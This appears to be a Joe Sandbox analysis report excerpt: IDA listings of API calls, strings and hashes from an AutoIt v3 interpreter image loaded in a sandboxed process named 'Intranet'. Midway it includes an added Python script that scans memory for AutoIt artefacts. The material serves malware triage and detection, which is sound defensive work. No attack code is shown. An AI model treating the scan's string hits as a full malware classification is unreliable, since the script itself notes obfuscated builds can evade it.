                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: f455767df14db01f811da189546ca56faff406e9033efe8f62ac0c2d05662d69
                                                                            • Instruction ID: 0c9139b8ddc4d88b326b4efc5d2e52d2f4332e01bb6dd2c6df35458216487ec0
                                                                            • Opcode Fuzzy Hash: f455767df14db01f811da189546ca56faff406e9033efe8f62ac0c2d05662d69
                                                                            • Instruction Fuzzy Hash: E451DA30A0478529FB34DBB044147EEBFB4BF01380F48959AD5C2571C3DA649A8CCBA6
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004FCE1C
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004FCE2E
                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004FCE8C
                                                                            • GetDlgItem.USER32(?,00000002), ref: 004FCE97
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004FCEA9
                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004FCEFD
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004FCF0B
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004FCF1C
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004FCF5F
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004FCF6D
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004FCF8A
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004FCF97
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: fc9673b95b69a79a251a3895943c581b4c5c4bd40b15f2946236b4ed0faba178
                                                                            • Instruction ID: 39b0ce3c40cc38b2491e0da26569730b146646bbae3186495035843346d45031
                                                                            • Opcode Fuzzy Hash: fc9673b95b69a79a251a3895943c581b4c5c4bd40b15f2946236b4ed0faba178
                                                                            • Instruction Fuzzy Hash: 12514F71B00309AFDF18CF68CD9AAAEBBB6EB98710F148129F615D63D0D774AD048B54
                                                                            APIs
                                                                              • Part of subcall function 004A1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004A2412,?,00000000,?,?,?,?,004A1AA7,00000000,?), ref: 004A1F76
                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004A24AF
                                                                            • KillTimer.USER32(?,?,?,?,?,004A1AA7,00000000,?,?,004A1EBE,?,?), ref: 004A254A
                                                                            • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,004A1AA7,00000000,?,?,004A1EBE,?,?), ref: 004DBFE7
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004A1AA7,00000000,?,?,004A1EBE,?,?), ref: 004DC018
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004A1AA7,00000000,?,?,004A1EBE,?,?), ref: 004DC02F
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004A1AA7,00000000,?,?,004A1EBE,?,?), ref: 004DC04B
                                                                            • DeleteObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004DC05D
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 641708696-0
                                                                            • Opcode ID: 4f97768d1c00d1018ccc44d4cd52f05db6fe37889533700b83e9580bb13a946e
                                                                            • Instruction ID: fb2c14dc877c165fc383804829662aa06de38dddb060d66e7f353d33d7fdae4a
                                                                            • Opcode Fuzzy Hash: 4f97768d1c00d1018ccc44d4cd52f05db6fe37889533700b83e9580bb13a946e
                                                                            • Instruction Fuzzy Hash: B261BE30114706DFCB269F58CA58B2677F1FB6931AF10851AE04247BA0C3B8AC95FF99
                                                                            APIs
                                                                              • Part of subcall function 004A29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1AE0,?,?,?,?,?,?,004A1D8F,?,?,?), ref: 004A29BC
                                                                            • GetSysColor.USER32(0000000F,?,?,?,?), ref: 004A25AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: 1c92ad0f160b6a4bebc954be86e33296aa934fd84a45c4cc39ce353769b6d442
                                                                            • Instruction ID: 2be0d5a7af6b33e0240315061d40aad6cd71ff084fd188171c9f1101e28367f6
                                                                            • Opcode Fuzzy Hash: 1c92ad0f160b6a4bebc954be86e33296aa934fd84a45c4cc39ce353769b6d442
                                                                            • Instruction Fuzzy Hash: 8F41C630405204AFDB255F2C9D98BBA3765FB2A335F144256FD658A3E1C7748C42FB29
                                                                            APIs
                                                                              • Part of subcall function 004C0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,004B2A3E,?,00008000), ref: 004C0BA7
                                                                              • Part of subcall function 004C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004B2A58,?,00008000), ref: 004C02A4
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 004B2ADF
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004B2C2C
                                                                              • Part of subcall function 004B3EBE: _wcscpy.LIBCMT ref: 004B3EF6
                                                                              • Part of subcall function 004C386D: _iswctype.LIBCMT ref: 004C3875
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                            • API String ID: 537147316-3738523708
                                                                            • Opcode ID: 5fdfbc0c033a4627ec25622d092f38c9d91924b22894ffb6e314bc5660c67962
                                                                            • Instruction ID: 96a58f4e43de7b3d1d5dc2804d1d76c4545f0b95625e672106dc5a26422a4cb3
                                                                            • Opcode Fuzzy Hash: 5fdfbc0c033a4627ec25622d092f38c9d91924b22894ffb6e314bc5660c67962
                                                                            • Instruction Fuzzy Hash: 6302B2301083419FC724EF25C951AAFBBE5BF99308F00491FF495932A2DB78D949CB6A
                                                                            APIs
                                                                              • Part of subcall function 004C00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,004B3094), ref: 004C00ED
                                                                              • Part of subcall function 004C08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,004B309F), ref: 004C08E3
                                                                            • RegOpenKeyExW.ADVAPI32(?,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004B30E2
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004F01BA
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004F01FB
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004F0239
                                                                            • _wcscat.LIBCMT ref: 004F0292
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                            • API String ID: 2673923337-2727554177
                                                                            • Opcode ID: f3e0da1d1878dce1b61c047b8752c83021544628ace60ce619b3dff223355986
                                                                            • Instruction ID: d38e0db975ca3274bbe9d3d20826309140a9d3100df2c6931b5db0aff730efe1
                                                                            • Opcode Fuzzy Hash: f3e0da1d1878dce1b61c047b8752c83021544628ace60ce619b3dff223355986
                                                                            • Instruction Fuzzy Hash: 2F71AF754053059EC304EF2AD8A59ABBBE8FF94344F80062FF445832B1DFB49948DB6A
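The two function listings above (the script parser carrying the strings "AU3!", "EA06" and "#include depth exceeded", and the registry lookup of Software\AutoIt v3\AutoIt\Include that appends "\Include\") identify the image loaded at 0x4A0000 in process 19 as an AutoIt v3 interpreter. The script below is an added triage check, not part of the Joe Sandbox report and not AutoIt's own code: it scans a memory image for those artefacts in both narrow and wide string form and returns the offsets. The input buffer is constructed for the example; the assumption that "AU3!" and "EA06" occur adjacent as the compiled-script marker "AU3!EA06" is marked in the code.

```python
import re

# Artefacts taken from the report's function listings: the registry key, value
# and suffix used by the include-path lookup (RegOpenKeyExW / RegQueryValueExW /
# _wcscat), and the two script-header strings "AU3!" and "EA06". Assumption of
# this example: the two halves are searched together as "AU3!EA06", the header
# marker of an AutoIt v3 compiled script; the report lists them separately.
AU3_MARKER = "AU3!EA06"
AUTOIT_REG_KEY = "Software\\AutoIt v3\\AutoIt"
AUTOIT_INCLUDE_VALUE = "Include"
AUTOIT_INCLUDE_SUFFIX = "\\Include\\"


def _offsets(buf: bytes, needle: bytes) -> list:
    """Offsets of every non-overlapping occurrence of needle in buf."""
    return [m.start() for m in re.finditer(re.escape(needle), buf)]


def scan_autoit_artefacts(buf: bytes) -> dict:
    """Search buf for each artefact as ASCII and as UTF-16LE.

    The W-suffixed registry APIs in the listing take wide strings, so the key
    and value names are expected in UTF-16LE; the script marker is expected as
    raw ASCII. Both encodings are tried for every needle so the check does not
    depend on how a given build stored the literal.
    """
    needles = {
        "au3_marker": AU3_MARKER,
        "reg_key": AUTOIT_REG_KEY,
        "reg_value": AUTOIT_INCLUDE_VALUE,
        "include_suffix": AUTOIT_INCLUDE_SUFFIX,
    }
    return {
        name: {
            "ascii": _offsets(buf, text.encode("ascii")),
            "utf16le": _offsets(buf, text.encode("utf-16-le")),
        }
        for name, text in needles.items()
    }


def is_autoit_image(buf: bytes) -> bool:
    """Verdict used for triage: script marker plus the registry key name together
    are strong evidence that buf is (or embeds) an AutoIt v3 interpreter."""
    found = scan_autoit_artefacts(buf)
    has_marker = bool(found["au3_marker"]["ascii"] or found["au3_marker"]["utf16le"])
    has_key = bool(found["reg_key"]["ascii"] or found["reg_key"]["utf16le"])
    return has_marker and has_key


def build_sample_image() -> bytes:
    """Constructed sample buffer, not a real dump: filler bytes with the artefacts
    embedded the way the interpreter would hold them (wide, NUL-terminated
    registry strings; narrow script marker)."""
    filler = bytes(range(256)) * 8
    return (
        filler
        + AUTOIT_REG_KEY.encode("utf-16-le") + b"\x00\x00"
        + filler
        + AUTOIT_INCLUDE_VALUE.encode("utf-16-le") + b"\x00\x00"
        + AUTOIT_INCLUDE_SUFFIX.encode("utf-16-le") + b"\x00\x00"
        + filler
        + AU3_MARKER.encode("ascii")
        + filler
    )


if __name__ == "__main__":
    sample = build_sample_image()
    for name, hits in scan_autoit_artefacts(sample).items():
        print(f"{name:15s} ascii={hits['ascii']} utf16le={hits['utf16le']}")
    print("AutoIt interpreter image:", is_autoit_image(sample))
```

A hit identifies the interpreter, not the payload: the compiled script that the interpreter runs still has to be carved out separately, and string hits alone can be defeated by a build that obfuscates these literals, so treat the verdict as a triage signal and not as a classification of the dropped binary.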
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __i64tow__itow__swprintf
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 421087845-2263619337
                                                                            • Opcode ID: 8fd81fbc027bda15400fc07bd3e84c799e2c02ce1188739313a434ae8d593740
                                                                            • Instruction ID: 9518ea18beb9d4ffff5c590b9ee2268273310af19e1bb7825b42e16838fd8de2
                                                                            • Opcode Fuzzy Hash: 8fd81fbc027bda15400fc07bd3e84c799e2c02ce1188739313a434ae8d593740
                                                                            • Instruction Fuzzy Hash: 9E411735A04209AFDB34DF34D851F7A77E8EB85304F20446FE149C7391EAB99942C719
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0052778F
                                                                            • CreateMenu.USER32 ref: 005277AA
                                                                            • SetMenu.USER32(?,00000000), ref: 005277B9
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00527846
                                                                            • IsMenu.USER32(?), ref: 0052785C
                                                                            • CreatePopupMenu.USER32 ref: 00527866
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00527893
                                                                            • DrawMenuBar.USER32 ref: 0052789B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                            • String ID: 0$F
                                                                            • API String ID: 176399719-3044882817
                                                                            • Opcode ID: 90e835fc741ef2a7819c2da3a3f3c5fea3367bb485b769eca26239281327dcc0
                                                                            • Instruction ID: ac56b1c96a79ce3e52aed51499137c214cd611442049983bce9d7bccdaf25de8
                                                                            • Opcode Fuzzy Hash: 90e835fc741ef2a7819c2da3a3f3c5fea3367bb485b769eca26239281327dcc0
                                                                            • Instruction Fuzzy Hash: DC415A79A00219EFDB10DF64E898A9ABBF5FF5A310F144429F945A73A0D730AD14DF50
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00527B83
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00527B8A
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00527B9D
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00527BA5
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00527BB0
                                                                            • DeleteDC.GDI32(00000000), ref: 00527BB9
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00527BC3
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00527BD7
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00527BE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: ece5f8d6345ceda6a3877aa8a27a1ead31c964ee51e76cb71d619f5a15f32908
• Instruction ID: 448bdb823eb6ab6ebf5d863fe725f6e34bc78a7423c22c84068e60cf0392e9dc
• Opcode Fuzzy Hash: ece5f8d6345ceda6a3877aa8a27a1ead31c964ee51e76cb71d619f5a15f32908
• Instruction Fuzzy Hash: 1E316732104229ABDF119F64EC59FDB3F69FF1E720F101215FA15A22E0D7719824EBA4
APIs
• GetSysColorBrush.USER32(0000000F), ref: 004B5156
• LoadCursorW.USER32(00000000,00007F00), ref: 004B5165
• LoadIconW.USER32(00000063), ref: 004B517C
• LoadIconW.USER32(000000A4), ref: 004B518E
• LoadIconW.USER32(000000A2), ref: 004B51A0
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004B51C6
• RegisterClassExW.USER32(?), ref: 004B521C
  • Part of subcall function 004A3411: GetSysColorBrush.USER32(0000000F), ref: 004A3444
  • Part of subcall function 004A3411: RegisterClassExW.USER32(00000030), ref: 004A346E
  • Part of subcall function 004A3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004A347F
  • Part of subcall function 004A3411: InitCommonControlsEx.COMCTL32(?), ref: 004A349C
  • Part of subcall function 004A3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004A34AC
  • Part of subcall function 004A3411: LoadIconW.USER32(000000A9), ref: 004A34C2
  • Part of subcall function 004A3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004A34D1
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 3489eedeaefb6c03470e7b704c105c72bdbd9534dbe2e8d58a83dd7b2f85ede7
• Instruction ID: 6cc9702cd167c38fad8958956f4e211e29033e1ecd53448b807d36ddabe96dd9
• Opcode Fuzzy Hash: 3489eedeaefb6c03470e7b704c105c72bdbd9534dbe2e8d58a83dd7b2f85ede7
• Instruction Fuzzy Hash: 84216B74D04308AFEB109FA8ED29B9D7BB4FB2C318F00015AF504A72A0D7F65558AF94
APIs
• _memset.LIBCMT ref: 004C706B
  • Part of subcall function 004C8D58: __getptd_noexit.LIBCMT ref: 004C8D58
• __gmtime64_s.LIBCMT ref: 004C7104
• __gmtime64_s.LIBCMT ref: 004C713A
• __gmtime64_s.LIBCMT ref: 004C7157
• __allrem.LIBCMT ref: 004C71AD
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C71C9
• __allrem.LIBCMT ref: 004C71E0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C71FE
• __allrem.LIBCMT ref: 004C7215
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C7233
• __invoke_watson.LIBCMT ref: 004C72A4
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
• Instruction ID: 1bfdf69ccb58fcef949a61011eef556d865eef8def360e89d914df9958521a02
• Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
• Instruction Fuzzy Hash: 92710676A04716ABD7549E7ACC81F5BB3A8AF41324F14422FF514E7381EB78D9408B98
APIs
• _memset.LIBCMT ref: 00502CE9
• GetMenuItemInfoW.USER32(00567890,000000FF,00000000,00000030,?,000000FF,?,?), ref: 00502D4A
• SetMenuItemInfoW.USER32(00567890,00000004,00000000,00000030), ref: 00502D80
• Sleep.KERNEL32(000001F4), ref: 00502D92
• GetMenuItemCount.USER32(?,?,000000FF,?,?), ref: 00502DD6
• GetMenuItemID.USER32(?,00000000), ref: 00502DF2
• GetMenuItemID.USER32(?,-00000001), ref: 00502E1C
• GetMenuItemID.USER32(?,?), ref: 00502E61
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00502EA7
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030,?,000000FF,?,?), ref: 00502EBB
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00502EDC
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: d88d923f7122ecddb7278c8a005fc672ff22b6added4f06262ae68317b618db0
• Instruction ID: 3b35df330eacfcc3596fc90698f774b4073cc85edd025302e3721c7b1b73825c
• Opcode Fuzzy Hash: d88d923f7122ecddb7278c8a005fc672ff22b6added4f06262ae68317b618db0
• Instruction Fuzzy Hash: F861687194024AAFDB21DF64CC8CABEBFADFB54308F144459E841A7291D731AD0AEB21
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 005275CA
• SendMessageW.USER32(00000000,?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 005275CD
• GetWindowLongW.USER32(?,000000F0,?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 005275F1
• _memset.LIBCMT ref: 00527602
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00527614
• SendMessageW.USER32(?,0000104D,00000000,00000007,?,00000000,005677C4), ref: 0052768C
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
